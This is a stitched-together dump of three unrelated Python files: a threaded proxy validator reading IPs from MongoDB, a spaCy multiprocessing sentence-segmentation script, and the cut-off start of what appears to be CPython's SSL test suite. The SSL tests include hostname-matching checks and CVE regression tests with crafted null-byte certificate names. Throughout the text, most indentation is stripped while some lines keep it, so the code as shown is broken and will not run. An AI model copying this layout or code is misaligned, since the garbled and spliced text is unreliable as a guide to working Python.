# -*- coding:utf-8 -*-
import threading
from app.mongo_model.ip import ip
from app.validate.request_web import request_web
class validate(object):
def run(self):
        while True:
_lists = ip().lists(10)
_threads = []
for _i in _lists:
_http_type = 'http' if _i.get('type') == 'ALL' else _i.get('type').lower()
_t = threading.Thread(target=request_web().run, args=(_http_type, _i.get('ip'), _i.get('port')))
_threads.append(_t)
for t in _threads:
t.start()
for t in _threads:
t.join()
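# Minimal runner sketch (an assumption, not part of the original module):
# repeatedly pull batches of ten proxies from MongoDB and validate them in threads.
if __name__ == '__main__':
    validate().run()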
|
sent_segmentation_multiProcessing.py
|
import multiprocessing
import spacy
from spacy.lang.en import English
import pickle
def worker(i, return_dict):
    """Worker function: each process segments four of the twenty splits."""
    # Each process handles splits i, i+5, i+10 and i+15. Storing the result
    # under each split's own key fixes the original bug where every assignment
    # overwrote return_dict[i].
    for offset in (0, 5, 10, 15):
        split_id = i + offset
        with open("../data/processed/Ensemble_splits/Ensemble_split{}.txt".format(split_id), "r") as file:
            trunk = file.read()
        # doc.sents yields sentences (boundaries are set by the sentencizer pipe).
        return_dict[split_id] = [str(sent) + "\n" for sent in nlp(trunk).sents]
nlp = English() # just the language with no model
sentencizer = nlp.create_pipe("sentencizer")
nlp.add_pipe(sentencizer)
nlp.max_length=2**30
manager = multiprocessing.Manager()
return_dict = manager.dict()
jobs = []
# 6 splits + 6 processes occupy about 200 GB; single-threaded, each 1/20 split takes 6 minutes, so 6*20/60 = 2 hours in total, and 2 hours / 6 processes = 20 mins per process.
for i in range(5):
p = multiprocessing.Process(target=worker, args=(i, return_dict))
jobs.append(p)
p.start()
for proc in jobs:
proc.join()
with open("sent_segmentation.pkl", "wb") as f:
pickle.dump(return_dict, f)
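# Optional follow-up, a sketch that is not in the original script: rebuild the
# corpus in split order; the output filename is an assumption.
with open("sent_segmentation.txt", "w") as out:
    for split_id in sorted(return_dict.keys()):
        out.writelines(return_dict[split_id])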
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import import_helper
from test.support import os_helper
from test.support import socket_helper
from test.support import threading_helper
from test.support import warnings_helper
import socket
import select
import time
import datetime
import enum
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = import_helper.import_module("ssl")
import _ssl
from ssl import TLSVersion, _TLSContentType, _TLSMessageType, _TLSAlertType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_OPENSSL_3_0_0 = ssl.OPENSSL_VERSION_INFO >= (3, 0, 0)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Oct 28 14:23:16 2037 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
NOSANFILE = data_file("nosan.pem")
NOSAN_HOSTNAME = 'localhost'
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
OP_IGNORE_UNEXPECTED_EOF = getattr(ssl, "OP_IGNORE_UNEXPECTED_EOF", 0)
# Ubuntu has patched OpenSSL and changed behavior of security level 2
# see https://bugs.python.org/issue41561#msg389003
def is_ubuntu():
try:
# Assume that any references of "ubuntu" implies Ubuntu-like distro
# The workaround is not required for 18.04, but doesn't hurt either.
with open("/etc/os-release", encoding="utf-8") as f:
return "ubuntu" in f.read()
except FileNotFoundError:
return False
if is_ubuntu():
def seclevel_workaround(*ctxs):
""""Lower security level to '1' and allow all ciphers for TLS 1.0/1"""
for ctx in ctxs:
if (
hasattr(ctx, "minimum_version") and
ctx.minimum_version <= ssl.TLSVersion.TLSv1_1
):
ctx.set_ciphers("@SECLEVEL=1:ALL")
else:
def seclevel_workaround(*ctxs):
pass
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
if IS_OPENSSL_3_0_0 and version < ssl.TLSVersion.TLSv1_2:
# bpo43791: 3.0.0-alpha14 fails with TLSV1_ALERT_INTERNAL_ERROR
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
ignore_deprecation = warnings_helper.ignore_warnings(
category=DeprecationWarning
)
def test_wrap_socket(sock, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
if not kwargs.get("server_side"):
kwargs["server_hostname"] = SIGNED_CERTFILE_HOSTNAME
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
else:
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE, *, server_chain=True):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
elif server_cert == NOSANFILE:
hostname = NOSAN_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
if server_chain:
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
ssl.OP_SINGLE_ECDH_USE
ssl.OP_NO_COMPRESSION
self.assertEqual(ssl.HAS_SNI, True)
self.assertEqual(ssl.HAS_ECDH, True)
self.assertEqual(ssl.HAS_TLSv1_2, True)
self.assertEqual(ssl.HAS_TLSv1_3, True)
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_ssl_types(self):
ssl_types = [
_ssl._SSLContext,
_ssl._SSLSocket,
_ssl.MemoryBIO,
_ssl.Certificate,
_ssl.SSLSession,
_ssl.SSLError,
]
for ssl_type in ssl_types:
with self.subTest(ssl_type=ssl_type):
with self.assertRaisesRegex(TypeError, "immutable type"):
ssl_type.value = None
support.check_disallow_instantiation(self, _ssl.Certificate)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS_CLIENT
self.assertEqual(str(proto), 'PROTOCOL_TLS_CLIENT')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
with warnings_helper.check_warnings():
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
with warnings_helper.check_warnings():
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', '[email protected]'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 1.1.1
self.assertGreaterEqual(n, 0x10101000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
libressl_ver = f"LibreSSL {major:d}"
openssl_ver = f"OpenSSL {major:d}.{minor:d}.{fix:d}"
self.assertTrue(
s.startswith((openssl_ver, libressl_ver)),
(s, t, hex(n))
)
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with warnings_helper.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_openssl111_deprecations(self):
options = [
ssl.OP_NO_TLSv1,
ssl.OP_NO_TLSv1_1,
ssl.OP_NO_TLSv1_2,
ssl.OP_NO_TLSv1_3
]
protocols = [
ssl.PROTOCOL_TLSv1,
ssl.PROTOCOL_TLSv1_1,
ssl.PROTOCOL_TLSv1_2,
ssl.PROTOCOL_TLS
]
versions = [
ssl.TLSVersion.SSLv3,
ssl.TLSVersion.TLSv1,
ssl.TLSVersion.TLSv1_1,
]
for option in options:
with self.subTest(option=option):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.options |= option
self.assertEqual(
'ssl.OP_NO_SSL*/ssl.SSL_NO_TLS* options are deprecated',
str(cm.warning)
)
for protocol in protocols:
with self.subTest(protocol=protocol):
with self.assertWarns(DeprecationWarning) as cm:
ssl.SSLContext(protocol)
self.assertEqual(
f'{protocol!r} is deprecated',
str(cm.warning)
)
for version in versions:
with self.subTest(version=version):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertWarns(DeprecationWarning) as cm:
ctx.minimum_version = version
self.assertEqual(
f'ssl.{version!r} is deprecated',
str(cm.warning)
)
@ignore_deprecation
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
@ignore_deprecation
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'),
('IP Address', '127.0.0.1'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
# socket.inet_ntoa(socket.inet_aton('127.1')) == '127.0.0.1'
fail(cert, '127.1')
fail(cert, '14.15.16.17 ')
fail(cert, '14.15.16.17 extra data')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if socket_helper.IPV6_ENABLED:
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::baba ')
fail(cert, '2003::baba extra data')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if socket_helper.IPV6_ENABLED:
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
